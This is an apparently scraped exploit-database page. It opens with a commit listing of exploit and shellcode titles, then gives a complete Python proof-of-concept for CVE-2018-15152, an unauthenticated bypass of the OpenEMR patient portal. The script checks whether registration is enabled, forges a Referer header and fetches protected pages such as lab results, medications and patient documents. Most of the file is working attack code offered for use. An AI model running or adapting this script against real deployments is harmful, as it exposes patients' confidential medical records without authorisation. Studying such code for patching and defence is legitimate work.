f33a724e0b
58 changes to exploits/shellcodes Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) ProFTPD 1.3.7a - Remote Denial of Service glFTPd 2.11a - Remote Denial of Service Hasura GraphQL 1.3.3 - Denial of Service Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) NBMonitor 1.6.8 - Denial of Service (PoC) Nsauditor 3.2.3 - Denial of Service (PoC) Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC) Post-it 5.0.1 - Denial of Service (PoC) Notex the best notes 6.4 - Denial of Service (PoC) SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC) Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) GeoGebra Graphing Calculator 6.0.631.0 - Denial Of Service (PoC) GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC) GeoGebra CAS Calculator 6.0.631.0 - Denial of Service (PoC) Backup Key Recovery 2.2.7 - Denial of Service (PoC) memono Notepad Version 4.2 - Denial of Service (PoC) Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path Cyberfox Web Browser 52.9.1 - Denial of Service (PoC) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access vsftpd 3.0.3 - Remote Denial of Service Dlink DSL2750U - 'Reboot' Command Injection PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) Netsia SEBA+ 0.16.1 - Add Root User (Metasploit) Arteco Web Client DVR/NVR - 'SessionId' Brute Force Resumes Management and Job Application Website 1.0 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) 'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) Mini Mouse 9.3.0 - Local File inclusion rconfig 3.9.6 - Arbitrary File Upload Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS) Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated) OpenEMR 5.0.1.3 - Authentication Bypass VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated) WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS) Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection Budget and Expense Tracker System 1.0 - Authenticated Bypass Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) Blood Bank System 1.0 - Authentication Bypass Lodging Reservation Management System 1.0 - Authentication Bypass Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read Linux/x64 - /sbin/halt -p Shellcode (51 bytes) Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2) Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
88 lines
No EOL
2.6 KiB
Python
Executable file
88 lines
No EOL
2.6 KiB
Python
Executable file
# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass
|
|
# Date 15.06.2021
|
|
# Exploit Author: Ron Jost (Hacker5preme)
|
|
# Vendor Homepage: https://www.open-emr.org/
|
|
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
|
|
# Version: All versions prior to 5.0.1.4
|
|
# Tested on: Ubuntu 18.04
|
|
# CVE: CVE-2018-15152
|
|
# CWE: CWE-287
|
|
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit
|
|
|
|
'''
|
|
Description:
|
|
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to
|
|
the registration page and modifying the requested url to access the desired page. Some
|
|
examples of pages in the portal directory that are accessible after browsing to the
|
|
registration page include:
|
|
- add_edit_event_user.php
|
|
- find_appt_popup_user.php
|
|
- get_allergies.php
|
|
- get_amendments.php
|
|
- get_lab_results.php
|
|
- get_medications.php
|
|
- get_patient_documents.php
|
|
- get_problems.php
|
|
- get_profile.php
|
|
- portal_payment.php
|
|
- messaging/messages.php
|
|
- messaging/secure_chat.php
|
|
- report/pat_ledger.php
|
|
- report/portal_custom_report.php
|
|
- report/portal_patient_report.php
|
|
Normally, access to these pages requires authentication as a patient. If a user were to visit
|
|
any of those pages unauthenticated, they would be redirected to the login page.
|
|
'''
|
|
|
|
|
|
'''
|
|
Import required modules:
|
|
'''
|
|
import requests
|
|
import argparse
|
|
|
|
|
|
'''
|
|
User-Input:
|
|
'''
|
|
my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')
|
|
my_parser.add_argument('-T', '--IP', type=str)
|
|
my_parser.add_argument('-P', '--PORT', type=str)
|
|
my_parser.add_argument('-U', '--Openemrpath', type=str)
|
|
my_parser.add_argument('-R', '--PathToGet', type=str)
|
|
args = my_parser.parse_args()
|
|
target_ip = args.IP
|
|
target_port = args.PORT
|
|
openemr_path = args.Openemrpath
|
|
pathtoread = args.PathToGet
|
|
|
|
|
|
'''
|
|
Check for vulnerability:
|
|
'''
|
|
# Check, if Registration portal is enabled. If it is not, this exploit can not work
|
|
session = requests.Session()
|
|
check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'
|
|
check_vuln = session.get(check_vuln_url).text
|
|
print('')
|
|
print('[*] Checking vulnerability: ')
|
|
print('')
|
|
|
|
if "Enter email address to receive registration." in check_vuln:
|
|
print('[+] Host Vulnerable. Proceeding exploit')
|
|
else:
|
|
print('[-] Host is not Vulnerable: Registration for patients is not enabled')
|
|
|
|
'''
|
|
Exploit:
|
|
'''
|
|
header = {
|
|
'Referer': check_vuln_url
|
|
}
|
|
exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread
|
|
Exploit = session.get(exploit_url, headers=header)
|
|
print('')
|
|
print('[+] Results: ')
|
|
print('')
|
|
print(Exploit.text)
|
|
print('') |